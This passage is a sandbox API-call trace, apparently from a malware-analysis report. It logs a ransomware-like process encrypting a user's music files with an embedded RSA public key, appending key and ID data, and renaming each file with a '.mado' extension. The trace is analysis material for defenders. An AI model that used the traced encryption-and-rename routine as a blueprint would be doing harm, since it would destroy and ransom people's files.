nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0204.442] SetFilePointer (in: hFile=0x63c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0204.442] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0x188f0, lpOverlapped=0x0) returned 1 [0204.442] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.443] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1da) returned 0x3310808 [0204.443] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.443] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.443] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x321b78) returned 1 [0204.443] CryptCreateHash (in: hProv=0x321b78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0204.444] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0204.444] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0204.444] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x32b3720 [0204.444] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0204.444] GetLastError () returned 0x0 [0204.444] CryptDestroyHash (hHash=0x32ef238) returned 1 [0204.444] CryptReleaseContext (hProv=0x321b78, dwFlags=0x0) returned 1 [0204.444] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0204.444] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0204.444] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0204.444] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0204.444] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b6bb80, Size=0x218) returned 0x3b7c8d0 [0204.444] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b74b68 [0204.444] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe298 | out: hHeap=0x2c0000) returned 1 [0204.444] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe2b0 | out: hHeap=0x2c0000) returned 1 [0204.444] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe2e0 | out: hHeap=0x2c0000) returned 1 [0204.445] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f7e58 | out: hHeap=0x2c0000) returned 1 [0204.445] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74b68 | out: hHeap=0x2c0000) returned 1 [0204.445] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe2e0 [0204.445] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277198 [0204.445] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x32fe2b0 [0204.445] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b36c0 [0204.445] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x32fe298 [0204.445] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277188 [0204.445] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x3b68078 [0204.445] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0204.445] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e51f8 [0204.445] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b3720 [0204.445] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x3b68190 [0204.445] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36e0 [0204.445] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0204.445] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b68078 | out: hHeap=0x2c0000) returned 1 [0204.445] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe2b0 | out: hHeap=0x2c0000) returned 1 [0204.445] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0204.445] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe298 | out: hHeap=0x2c0000) returned 1 [0204.445] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36c0 | out: hHeap=0x2c0000) returned 1 [0204.445] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0204.445] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe2e0 | out: hHeap=0x2c0000) returned 1 [0204.445] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0204.445] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e5198 | out: hHeap=0x2c0000) returned 1 [0204.445] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c8d0 | out: hHeap=0x2c0000) returned 1 [0204.445] GetCurrentThreadId () returned 0x600 [0204.445] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6eb80 [0204.445] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x3b71990 [0204.445] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x32c0218 [0204.445] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0204.445] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x336fe98 [0204.446] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0204.446] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277188 [0204.446] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6ee98 [0204.446] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.446] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.446] GetCurrentThreadId () returned 0x600 [0204.446] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.446] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.446] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x32b69d8 [0204.446] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.446] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.446] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.446] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.446] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b69d8 | out: hHeap=0x2c0000) returned 1 [0204.446] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6ec88 [0204.446] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0204.446] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x32c3a48 [0204.446] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0204.446] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6efa0 [0204.446] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0204.446] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe2e0 [0204.446] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0204.446] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0204.446] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9e0 [0204.446] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9f0 [0204.446] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b780 [0204.446] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b790 [0204.446] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7a0 [0204.446] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7b0 [0204.446] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe298 [0204.446] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0204.447] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9e0 [0204.447] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0204.447] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0204.447] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7c0 [0204.447] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7d0 [0204.447] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7e0 [0204.447] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe2b0 [0204.447] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7d0 | out: hHeap=0x2c0000) returned 1 [0204.447] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36c0 [0204.447] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7c0 | out: hHeap=0x2c0000) returned 1 [0204.447] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe280 [0204.447] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7e0 | out: hHeap=0x2c0000) returned 1 [0204.447] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe2f8 [0204.447] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0204.447] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x32771c8 [0204.447] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7a0 | out: hHeap=0x2c0000) returned 1 [0204.447] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe2c8 [0204.447] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0204.447] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe310 [0204.447] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0204.447] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9f0 [0204.447] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0204.447] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36a0 [0204.447] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0204.447] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b37c0 [0204.447] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe298 | out: hHeap=0x2c0000) returned 1 [0204.447] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe298 [0204.447] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0204.447] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x3b7c8d0 [0204.447] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe2e0 | out: hHeap=0x2c0000) returned 1 [0204.448] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b68078 [0204.448] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe310 | out: hHeap=0x2c0000) returned 1 [0204.448] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x3b74b68 [0204.448] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b37c0 | out: hHeap=0x2c0000) returned 1 [0204.448] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x3b682a8 [0204.448] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b780 | out: hHeap=0x2c0000) returned 1 [0204.448] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b683c0 [0204.448] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe298 | out: hHeap=0x2c0000) returned 1 [0204.448] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x3b74d80 [0204.448] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b68078 | out: hHeap=0x2c0000) returned 1 [0204.448] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6ed90 [0204.448] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0204.448] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321b78 | out: hHeap=0x2c0000) returned 1 [0204.448] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6ec88 | out: hHeap=0x2c0000) returned 1 [0204.448] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6ed90 | out: hHeap=0x2c0000) returned 1 [0204.448] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36a0 | out: hHeap=0x2c0000) returned 1 [0204.448] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b683c0 | out: hHeap=0x2c0000) returned 1 [0204.448] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74b68 | out: hHeap=0x2c0000) returned 1 [0204.448] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74d80 | out: hHeap=0x2c0000) returned 1 [0204.448] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b682a8 | out: hHeap=0x2c0000) returned 1 [0204.448] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b790 | out: hHeap=0x2c0000) returned 1 [0204.448] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe2c8 | out: hHeap=0x2c0000) returned 1 [0204.448] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7b0 | out: hHeap=0x2c0000) returned 1 [0204.448] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe2f8 | out: hHeap=0x2c0000) returned 1 [0204.448] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36c0 | out: hHeap=0x2c0000) returned 1 [0204.448] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe2b0 | out: hHeap=0x2c0000) returned 1 [0204.449] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe280 | out: hHeap=0x2c0000) returned 1 [0204.449] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0204.449] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0218 | out: hHeap=0x2c0000) returned 1 [0204.449] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6ee98 | out: hHeap=0x2c0000) returned 1 [0204.449] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe268 | out: hHeap=0x2c0000) returned 1 [0204.449] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b80738 | out: hHeap=0x2c0000) returned 1 [0204.449] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c8d0 | out: hHeap=0x2c0000) returned 1 [0204.449] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6efa0 | out: hHeap=0x2c0000) returned 1 [0204.449] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c3a48 | out: hHeap=0x2c0000) returned 1 [0204.449] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b68190 | out: hHeap=0x2c0000) returned 1 [0204.449] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b3720 | out: hHeap=0x2c0000) returned 1 [0204.449] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0204.449] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36e0 | out: hHeap=0x2c0000) returned 1 [0204.449] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e51f8 | out: hHeap=0x2c0000) returned 1 [0204.449] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32eb20 | out: hHeap=0x2c0000) returned 1 [0204.449] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0204.449] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0204.449] WriteFile (in: hFile=0x63c, lpBuffer=0x3b81690*, nNumberOfBytesToWrite=0x188eb, lpNumberOfBytesWritten=0x39cfb14, lpOverlapped=0x0 | out: lpBuffer=0x3b81690*, lpNumberOfBytesWritten=0x39cfb14*=0x188eb, lpOverlapped=0x0) returned 1 [0204.449] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b81690 | out: hHeap=0x2c0000) returned 1 [0204.449] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x188f0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0204.450] WriteFile (in: hFile=0x63c, lpBuffer=0x3b6eb80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b6eb80*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0204.450] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6eb80 | out: hHeap=0x2c0000) returned 1 [0204.450] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384580 [0204.450] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x3b74b68 [0204.450] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1", cchWideChar=-1, lpMultiByteStr=0x3b74b68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1", lpUsedDefaultChar=0x0) returned 41 [0204.450] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x3b74f98 [0204.450] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74b68 | out: hHeap=0x2c0000) returned 1 [0204.450] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384580 | out: hHeap=0x2c0000) returned 1 [0204.450] WriteFile (in: hFile=0x63c, lpBuffer=0x3b74f98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b74f98*, lpNumberOfBytesWritten=0x39cfb50*=0x28, lpOverlapped=0x0) returned 1 [0204.450] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74f98 | out: hHeap=0x2c0000) returned 1 [0204.450] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0204.450] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0204.450] CloseHandle (hObject=0x63c) returned 1 [0204.451] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x32c2b20 [0204.452] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x870) returned 0x3b74b68 [0204.452] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c2b20 | out: hHeap=0x2c0000) returned 1 [0204.452] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\gX1KLciA.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\gx1klcia.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\gX1KLciA.m4a.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\gx1klcia.m4a.mado")) returned 1 [0204.452] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74b68 | out: hHeap=0x2c0000) returned 1 [0204.452] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0204.452] VirtualFree (lpAddress=0x3d10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.453] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326020 | out: hHeap=0x2c0000) returned 1 [0204.453] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4ca5de80, ftCreationTime.dwHighDateTime=0x1d5d944, ftLastAccessTime.dwLowDateTime=0xc78d640, ftLastAccessTime.dwHighDateTime=0x1d5e057, ftLastWriteTime.dwLowDateTime=0xc78d640, ftLastWriteTime.dwHighDateTime=0x1d5e057, nFileSizeHigh=0x0, nFileSizeLow=0x15f97, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="H6AAML5ic7p-F.mp3", cAlternateFileName="H6AAML~1.MP3")) returned 1 [0204.453] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x32c3a48 [0204.453] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x76) returned 0x326020 [0204.453] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c3a48 | out: hHeap=0x2c0000) returned 1 [0204.453] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\H6AAML5ic7p-F.mp3") returned=".mp3" [0204.454] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\H6AAML5ic7p-F.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\h6aaml5ic7p-f.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0204.454] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=90007) returned 1 [0204.455] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0204.457] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x15f71, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0204.457] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0204.458] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0204.458] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0204.458] SetFilePointer (in: hFile=0x63c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: 